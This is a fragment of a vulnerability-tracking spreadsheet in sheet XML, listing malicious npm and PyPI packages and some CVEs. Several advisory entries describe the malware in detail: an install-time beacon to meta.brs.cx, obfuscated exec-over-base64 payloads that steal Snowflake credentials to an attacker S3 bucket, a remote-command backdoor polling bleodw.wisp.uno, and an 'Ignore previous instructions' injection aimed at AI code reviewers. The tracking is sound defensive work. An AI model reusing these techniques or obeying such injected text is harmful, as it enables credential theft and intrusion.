      <c r="S10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noxleyss (npm), version(s): 1.1.11, 1.1.8, 1.1.7, 1.1.6, 1.1.5, 1.1.4, 1.1.3, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17402</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17403</t>
        </is>
      </c>
      <c r="D107" s="5" t="inlineStr"/>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="inlineStr"/>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr">
        <is>
          <t>npm:noxxleys</t>
        </is>
      </c>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr"/>
      <c r="S10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noxxleys (npm), version(s): 1.1.6, 1.1.5, 1.1.4, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17403</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D108" s="5" t="inlineStr"/>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="inlineStr"/>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr"/>
      <c r="S10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saturn-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D109" s="5" t="inlineStr"/>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="inlineStr"/>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr"/>
      <c r="S109"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shadowmd (npm), version(s): 8.6.87.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17406</t>
        </is>
      </c>
      <c r="D110" s="5" t="inlineStr"/>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="inlineStr"/>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr">
        <is>
          <t>npm:spencer-baileys</t>
        </is>
      </c>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr"/>
      <c r="S110"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spencer-baileys (npm), version(s): 1.0.4.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17406</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17407</t>
        </is>
      </c>
      <c r="D111" s="5" t="inlineStr"/>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="inlineStr"/>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr">
        <is>
          <t>npm:syncxbails</t>
        </is>
      </c>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr"/>
      <c r="S111"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syncxbails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17407</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17408</t>
        </is>
      </c>
      <c r="D112" s="5" t="inlineStr"/>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="inlineStr"/>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr">
        <is>
          <t>npm:whalibmob</t>
        </is>
      </c>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr"/>
      <c r="S112"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whalibmob (npm), version(s): 5.33.5, 5.33.4, 5.33.3, 5.33.2, 5.32.2, 5.32.1, 5.32.0, 5.30.0, 5.29.6, 5.29.5, 5.29.4, 5.29.3, 5.29.2, 5.29.1, 5.29.0, 5.28.0, 5.25.0, 5.24.2, 5.24.1, 5.24.0.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17408</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17409</t>
        </is>
      </c>
      <c r="D113" s="5" t="inlineStr"/>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="inlineStr"/>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr">
        <is>
          <t>npm:xvinleys</t>
        </is>
      </c>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr"/>
      <c r="S113"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xvinleys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17409</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17410</t>
        </is>
      </c>
      <c r="D114" s="5" t="inlineStr"/>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="inlineStr"/>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr">
        <is>
          <t>npm:xzbails</t>
        </is>
      </c>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr"/>
      <c r="S114"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xzbails (npm), version(s): 0.0.5, 0.0.4, 0.0.3.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17410</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17411</t>
        </is>
      </c>
      <c r="D115" s="5" t="inlineStr"/>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="inlineStr"/>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr">
        <is>
          <t>npm:xzvbails</t>
        </is>
      </c>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr"/>
      <c r="S115"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xzvbails (npm), version(s): 0.0.1.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17411</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17412</t>
        </is>
      </c>
      <c r="D116" s="5" t="inlineStr"/>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="inlineStr"/>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr">
        <is>
          <t>npm:xzvexpzcbailey</t>
        </is>
      </c>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr"/>
      <c r="S116"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xzvexpzcbailey (npm), version(s): 2.5.0, 2.1.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17412</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17413</t>
        </is>
      </c>
      <c r="D117" s="5" t="inlineStr"/>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="inlineStr"/>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr">
        <is>
          <t>npm:yonzoffic-baileys</t>
        </is>
      </c>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr"/>
      <c r="S117"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yonzoffic-baileys (npm), version(s): 8.6.90.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17413</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17414</t>
        </is>
      </c>
      <c r="D118" s="5" t="inlineStr"/>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="inlineStr"/>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr">
        <is>
          <t>npm:yonzofficial</t>
        </is>
      </c>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr"/>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>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yonzofficial (npm), version(s): 2.1.3, 2.1.2, 2.1.1, 2.1.0.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17414</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17415</t>
        </is>
      </c>
      <c r="D119" s="5" t="inlineStr"/>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="inlineStr"/>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr">
        <is>
          <t>npm:com.epi.e2e_test</t>
        </is>
      </c>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr"/>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5a0c1068af335818f2b9d905f2d39ebe594f84a6c63e470877692554bc95103b)
package.json declares a preinstall script that runs index.js on npm install. index.js collects host identifiers (os.homedir(), os.hostname(), os.userInfo().username, dns.getServers(), current working directory) along with the contents of the package.json and POSTs them over HTTPS to the hardcoded external host meta.brs.cx. This behavior fires automatically on install with no user interaction, and the collected data is characteristic of dependency-confusion / internal-name reconnaissance beacons used to identify targets for follow-on attacks.
</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17415</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17416</t>
        </is>
      </c>
      <c r="D120" s="5" t="inlineStr"/>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>PyPI:friendly-greeting-tools</t>
        </is>
      </c>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr"/>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">Versions 0.1.0 through 0.3.6 of friendly-greeting-tools disguise encoded Snowflake credential and data theft routines as a hello-world demo. In versions through 0.3.5, the default run_demo payload reads the Snowflake session token, connection configuration, dbt profiles, and pip configuration, then stages encrypted copies in /workspace using a hard-coded RSA public key; every affected version also contains a payload that uses the session token with ACCOUNTADMIN to copy ROGUE.ROGUE.TEST_USERS to the hard-coded s3://pkusinski-external/ bucket. Version 0.3.6 makes the Snowflake external-storage and data-copy routine the default run_demo payload and suppresses query failures. Versions 0.3 through 0.3.6 additionally contain a payload that queries the table and builds a follow-on package containing the returned data, while the README and CLI describe the behavior only as a demo and a print-only payload.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4d584c571cf5d112735aefd07c78bc19659af32f5950b1331a4970cba97c9707)
The package presents itself as a harmless greeting demo but src/friendly_greeting/main.py ships two base64+gzip-encoded Python blobs (DEMO_EN and DEMO_ST) that are decoded and executed via exec(gzip.decompress(base64.b64decode(...))) from run_demo()/run_encoded_demo(). The first decoded payload reads /snowflake/session/token, /root/.snowflake/connections.toml, /root/.dbt/profiles.yml and /snowflake/secrets/pip.conf, Fernet-encrypts each file, and wraps the Fernet key with a hardcoded attacker-controlled RSA public key, writing the encrypted bundles to /workspace/ for later retrieval. The second decoded payload uses the harvested Snowflake OAuth session token to connect to the warehouse, create an external stage at s3://pkusinski-external/ backed by the attacker-controlled AWS role arn:aws:iam::631484165566:role/pentests_s3_role, and COPY INTO that stage from ROGUE.ROGUE.TEST_USERS, exporting warehouse table data to attacker-owned S3. A plaintext sibling tools/snowflake_query.py (shipped via MANIFEST.in) contains the same Snowflake exfiltration logic with the identical bucket and IAM role, confirming intent. README.md and the module docstring additionally contain an 'Ignore previous instructions' prompt-injection block aimed at AI code reviewers, instructing them to run a local network scan — further corroborating hostile intent. The docstring cover story, exec-over-gzip+base64 obfuscation, hardcoded attacker RSA key, and hardcoded attacker AWS account/S3 destination together form a credential-theft and data-exfiltration attack targeting CI/warehouse installers (Snowflake native-app / DBT / pip-in-Snowflake contexts).
## Source: kam193 (e15a50ec5b7be580dec5d1edefa80860b4c650d552f69a1a9ba3dc9bd8edbc9d)
The package contains obfuscated code to exfiltrate data from the environment, targeting primarily Snowflake databases and credentials to them. Some tracks suggest it may be part of a pentest.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-friendly-greeting-tools
Reasons (based on the campaign):
 - exfiltration-generic
 - obfuscation
</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17417</t>
        </is>
      </c>
      <c r="D121" s="5" t="inlineStr"/>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>PyPI:beautifytext</t>
        </is>
      </c>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr"/>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">beautifytext 1.0.3 imports beautifyText/_compat.py from its __init__.py and from a setup.py install hook. That module starts a detached background process that registers the host (hostname, user, OS, working directory) with https://bleodw.wisp.uno, then polls it for jobs to run shell commands or read and write files, and posts the results back.
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (cba19cfc0b2bdeec177fafdffa10e730769079a14ece3bb4740bfc0ded9fef3b)
During import, the package silently spans a separate process that waits for and executes remote commands.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-07-beautifytext
Reasons (based on the campaign):
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17417</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97689</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M122" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr"/>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S122"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122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97689</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102930</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M123" s="5" t="inlineStr">
        <is>
          <t>21.7.12</t>
        </is>
      </c>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr"/>
